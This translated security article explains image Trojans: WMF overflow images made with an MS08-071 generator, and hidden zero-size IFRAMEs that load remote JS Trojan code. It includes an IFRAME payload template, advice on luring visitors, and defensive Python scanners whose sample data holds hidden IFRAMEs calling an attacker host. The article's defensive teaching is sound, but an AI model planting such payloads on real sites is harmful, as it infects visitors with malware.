In the history of webpage Trojans, the image Trojan is a very "old" technique. Why is this old Trojan technique still widely used? Why is it so rampant? How can we prevent it? As a security engineer, you have to know this ......
Ruijia team, Li Haibo: many famous forums have seen hackers use image Trojans. This is a typical overflow attack, and it is very dangerous. Hackers use images to mount Trojans, and the most typical method is advertising. Once, a hacker purchased an advertisement on a portal website in order to mount a Trojan. Because some websites do not store ad images in their own website space but point to an address specified by the customer, after the hacker bought the advertisement slot he changed the image the advertisement pointed to into a malicious overflow image, which caused many users to mistakenly think that the portal website itself had been hacked. When performing website security maintenance, some website administrators often think that maintenance is done once and for all; they ignore upgrading the anti-virus system and forget to regularly review the programs and systems for planned maintenance, and as a result many websites are repeatedly attacked by hackers. Therefore, a qualified security engineer should patiently review and troubleshoot complex projects without missing any detail, and always pay attention to the release and updating of the various security announcements. This is the ultimate strategy for preventing webpage Trojans.
Why are image Trojans favored?
The reason hackers are keen on using image Trojans to catch bots (zombie machines) is that image Trojans are well hidden. It is time-consuming and laborious for a network administrator to find a harmful file among thousands of images, and it is difficult to detect a seemingly unproblematic image that has been embedded in a webpage.
More importantly, images are always the best bait for capturing bots. Hackers often only need to mount the Trojan on their own website and then give it a sensational or suggestive name, and a steady stream of bots will come knocking at the door. So image Trojans are just like the man-eating sirens of ancient legend: first they confuse the sailors at sea with beautiful songs and make them deviate from their course, and then the sailors throw themselves into the sirens' trap.
There are two main ways to mount image Trojans. One is to directly exploit JPG, GDI, or ANI vulnerabilities to create overflow files, upload them to or link them from the compromised website, and wait for unpatched users to take the bait.
The other is to disguise a Trojan: obfuscate a webpage Trojan that contains JS code or IFRAME code and add it to an HTML file.
Attack and defense of image Trojans
Method 1: Image vulnerability Trojans
Attack
This Trojan method mainly exploits vulnerabilities in the system or in the website-building program. We take the MS08-071 vulnerability as an example to explain it. First open the MS08-071 overflow generator and enter the Trojan's address in the address column (figure 1).
Select a normal image (preferably a BMP image) in the image address option and click "generate". An image containing malicious code (in WMF format) appears in the directory where the overflow program is located (figure 2).
Encyclopedia: The MS08-071 vulnerability is a remote code execution vulnerability. If a user opens a specially crafted WMF image file, the vulnerability is triggered and the hacker gains remote control. The hacker then has permission to view, modify, or delete data, or to create new accounts.
After the malicious image is generated, save it to the specified website and add the normal image-display code that points to it to the webpage, modifying the IP address according to the actual situation. Once the code is added, every visitor who browses the webpage will be infected.
Defense
The best way to prevent this type of image Trojan is to deploy an anti-virus system on the server. Generally, anti-virus systems detect and remove Trojans that exploit this vulnerability with a high detection rate and speed. If necessary, remind the employees of the organization to promptly apply system patches to prevent internal infections. This malicious-image overflow method currently has many variants, such as JPG, GIF, ANI, and GDI.
In addition, although an overflow image file can sometimes be displayed normally, in most cases it is not, especially when the image is viewed as a thumbnail: overflow images containing malicious code often fail to render in thumbnail view. Therefore, a security engineer can use the thumbnail view in Windows Explorer to check which images on the website cannot be displayed normally in thumbnail mode.
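The thumbnail check above is manual and only works for images Windows refuses to render. An automated counterpart for the server side, added here as an example (it is not code from the original article and not a tool it names), is to inspect each file in the image directory by its leading bytes: a WMF, EMF, or ANI metafile that has been renamed to .bmp or .jpg (the MS08-071-style case) is reported, as is a file whose real format disagrees with its extension, a file that carries HTML or script markup in its body (the "HTML saved as GIF" trick from method 2 below), and a BMP whose file header does not agree with the file's actual size. The sample files are constructed in memory and are not real malware; only scan_directory() touches disk.

```python
"""Defender's scan of an image directory for image-Trojan patterns.

Added example, not code from the original article. Identifies each file by
magic bytes, flags format/extension mismatches and disguised metafiles,
flags embedded HTML markup, and sanity-checks BMP file headers.
"""
import os
import re
import struct

# Leading bytes -> format name. More specific prefixes come first.
SIGNATURES = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"BM", "bmp"),
    (b"\xd7\xcd\xc6\x9a", "wmf"),   # placeable (Aldus) WMF header
    (b"\x01\x00\x09\x00", "wmf"),   # standard WMF header
    (b"\x01\x00\x00\x00", "emf"),   # EMF: first record is EMR_HEADER (type 1)
]
# Which extension may legitimately carry which format.
ALLOWED = {".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif", ".png": "png", ".bmp": "bmp"}
# GDI renders these as pictures, but a web image directory should never contain them.
METAFILES = {"wmf", "emf", "ani"}
# Markup that has no business inside an image file.
HTML_MARKUP = re.compile(rb"<\s*/?\s*(html|script|iframe|object|embed)\b", re.IGNORECASE)


def identify(data):
    """Return the format implied by the file's leading bytes, or None."""
    if data[:4] == b"RIFF" and data[8:12] == b"ACON":   # animated cursor (.ani)
        return "ani"
    for magic, fmt in SIGNATURES:
        if data.startswith(magic):
            return fmt
    return None


def check_bmp(data):
    """Consistency checks on the 14-byte BITMAPFILEHEADER; None if consistent."""
    if len(data) < 14:
        return "truncated BMP header"
    declared_size, _, _, pixel_offset = struct.unpack("<IHHI", data[2:14])
    if declared_size != len(data):
        return "BMP declared size %d but file is %d bytes" % (declared_size, len(data))
    if pixel_offset >= len(data):
        return "BMP pixel data offset %d lies beyond end of file" % pixel_offset
    return None


def scan_bytes(filename, data):
    """Return a list of finding strings for one file; an empty list means it looks clean."""
    findings = []
    ext = os.path.splitext(filename)[1].lower()
    fmt = identify(data)
    if fmt is None:
        findings.append("unrecognised image format")
    elif fmt in METAFILES:
        findings.append("%s metafile disguised with extension %s" % (fmt, ext or "(none)"))
    elif ALLOWED.get(ext) != fmt:
        findings.append("content is %s but extension is %s" % (fmt, ext or "(none)"))
    if fmt == "bmp":
        problem = check_bmp(data)
        if problem:
            findings.append(problem)
    m = HTML_MARKUP.search(data)
    if m:
        tag = m.group(1).decode("ascii").lower()
        findings.append("HTML markup <%s> embedded at offset %d" % (tag, m.start()))
    return findings


def scan_directory(root):
    """Walk a real image directory; returns {path: findings} for files with findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            findings = scan_bytes(name, data)
            if findings:
                report[path] = findings
    return report


def _minimal_bmp():
    """A valid 1x1 24-bit BMP (58 bytes) built by hand."""
    pixels = b"\x00\x00\xff\x00"                       # one BGR pixel plus row padding
    dib = struct.pack("<IiiHHIIiiII", 40, 1, 1, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    header = b"BM" + struct.pack("<IHHI", 14 + len(dib) + len(pixels), 0, 0, 14 + len(dib))
    return header + dib + pixels


# Constructed sample inputs (not real malware), named as they might appear on a site.
SAMPLES = {
    "good.bmp": _minimal_bmp(),
    "logo.bmp": b"\xd7\xcd\xc6\x9a" + b"\x00" * 60,                 # WMF renamed to .bmp
    "cursor.jpg": b"RIFF" + b"\x00" * 4 + b"ACON" + b"\x00" * 32,    # ANI renamed to .jpg
    "banner.gif": b"GIF89a" + b"\x00" * 16
        + b'<html><iframe src="http://example.invalid/t.js" height=0 width=0></iframe></html>',
    "photo.jpg": b"GIF89a" + b"\x00" * 32,                           # real GIF, wrong extension
}


def scan_samples():
    """Run the scan over the constructed samples; {name: findings}."""
    return {name: scan_bytes(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, "->", findings or "clean")
```

Run it against the site's upload directory with scan_directory() and treat every finding as something to pull from the site until a person has looked at it; the magic-byte table is deliberately small, so extend ALLOWED and SIGNATURES with whatever formats the site legitimately serves rather than loosening the checks.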
Method 2: Fake image Trojans
Attack
This method is relatively simple, so it has become very popular recently. The specific operation is as follows: first prepare the special JS Trojan code, then open WordPad and enter the HTML code below (set the Trojan address embedded in the frame to the address of the image Trojan webpage):
<html>
<iframe src="http://[address of the JS Trojan code].js" height=0 width=0></iframe>
</center>
</html>
Insert the code into an internal page of the target website, or save it as an HTML file and upload it to the target website. When a user accesses the webpage, the effect is as shown in figure 3.
In fact, this Trojan method only uses images to divert the attention of webpage visitors. Earlier, similar HTML code could be saved as a GIF file and uploaded to or mounted on a Dvbbs (dynamic network) forum. However, the method of directly saving it as a GIF no longer works.
Defense
This defense is similar to the one used against IFRAME Trojans: the following CSS expression code can block JS files from external domains from running.
iframe { zimo1: expression(this.src = 'about:blank', this.outerHTML = ''); }
script { zimo2: expression((this.src.toLowerCase().indexOf('http') == 0) ? document.execCommand('stop') : ''); }
This code immediately calls IE's private execCommand method to stop all requests on the page, so the JS file in the external domain is forcibly stopped from downloading, just as if we had clicked the "Stop" button in the browser.
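The CSS expression trick above only runs inside Internet Explorer (CSS expressions are an IE-only feature that IE 8 dropped in standards mode), so it protects visitors rather than telling the site owner that a page has been tampered with. The following is an added example, not code from the article, of the server-side counterpart: a scan the site maintainer can run over the published pages to find exactly the method-2 markup, an IFRAME hidden by zero size or an inline style, and a script or frame pulled from a host other than the site's own. site_host is the site's own host name and is the one assumption; the sample page is constructed here and uses reserved .invalid names.

```python
"""Find hidden IFRAMEs and off-site <script src> in page HTML.

Added example, not the article's code. Server-side detection of the
method-2 pattern, using only the Python standard library.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def _pixels(value):
    """'0', '0px', ' 600 ' -> int; anything else -> None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _is_hidden(attrs):
    """True if an IFRAME is made invisible by its own attributes or inline style."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        size = _pixels(attrs.get(dim))
        if size is not None and size <= 1:        # 0x0 and 1x1 frames are both invisible
            return True
    return False


def _is_offsite(url, site_host):
    """True if url resolves to a host other than site_host; relative URLs are on-site."""
    host = urlparse((url or "").strip()).hostname   # lower-cased, no port or userinfo
    if host is None:
        return False
    return host != site_host


class MarkupScanner(HTMLParser):
    """Collects (kind, src) findings while the page is parsed."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                # HTMLParser already lower-cases tag and attribute names
        src = (a.get("src") or "").strip()
        if tag == "iframe":
            if _is_hidden(a):
                self.findings.append(("hidden-iframe", src))
            elif _is_offsite(src, self.site_host):
                self.findings.append(("offsite-iframe", src))
        elif tag == "script" and src and _is_offsite(src, self.site_host):
            self.findings.append(("offsite-script", src))


def scan_html(html, site_host):
    """Return the list of (kind, src) findings for one page's HTML source."""
    scanner = MarkupScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one legitimate local script and frame, plus the
# method-2 injection (zero-size IFRAME and off-site script) and a style-hidden frame.
SAMPLE_PAGE = """<html><body>
<img src="/images/news.jpg" alt="news">
<script src="/js/site.js"></script>
<iframe src="http://attacker.invalid/t.js" height=0 width=0></iframe>
<script src="http://attacker.invalid/t.js"></script>
<iframe src="/help/embed.html" width="600" height="400"></iframe>
<iframe src="http://ads.example.invalid/x.html" style="display: none"></iframe>
</body></html>"""


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE, "www.example.com"):
        print("%-15s %s" % (kind, src))
```

Run scan_html() over every page on a schedule and diff the findings against a baseline taken when the site was known clean, so that a newly appearing entry is the alert. For the visitor's side, the browser-enforced equivalent of the CSS expression trick today is a Content-Security-Policy response header such as script-src 'self'; frame-src 'self', which makes the browser refuse off-site scripts and frames regardless of what was injected into the page.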